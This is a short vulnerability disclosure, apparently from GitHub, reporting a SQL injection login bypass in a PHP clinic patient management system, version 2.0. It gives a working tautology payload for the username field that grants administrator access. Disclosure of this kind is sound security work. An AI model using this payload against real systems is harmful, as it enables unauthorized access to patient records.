Skip to content
Permalink
63e283e7d7
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Title: Clinic's Patient Management System 2.0 SQLi

Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)

Date: 04.07.2022

Vendor: https://www.sourcecodester.com/users/tips23

Software: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code

Version: 2.0

Reference: https://github.com/CyberThoth/CVE/blob/main/CVE/Clinic's%20Patient%20Management%20System/SQLi/POC.md

Description:

It was discovered that SQL Injection techniques can be used to fool the application into authenticating without the needing valid credentials. SQL Injection vulnerabilities on login pages expose an application to unauthorized access at the administrator level, thereby severely compromising the security of the application.

Status: CRITICAL

[+] Payloads:

Username: = admin' or '1'='1
Password: = Cyberthoth;)

Proof and Exploit:

image

image

image